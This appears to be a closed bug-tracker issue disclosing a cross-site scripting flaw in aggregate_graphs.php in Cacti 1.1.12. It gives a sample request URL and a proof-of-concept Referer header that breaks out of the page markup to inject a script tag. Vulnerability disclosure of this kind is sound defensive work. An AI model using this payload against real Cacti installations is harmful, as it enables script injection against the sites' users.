Closed
Description
xiaotian.wang@DBAppSecurity.com.cn
Cross-site scripting (XSS) vulnerability in aggregate_graphs.php in Cacti 1.1.12 allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers.
http://192.168.1.206/cacti/aggregate_graphs.php?action=edit&tab=details&id=1
Referer:aaaaaaaaaaaaaaa")'></td></tr><script>alert(1)</script>
Metadata
Metadata
Assignees
Labels
No labels
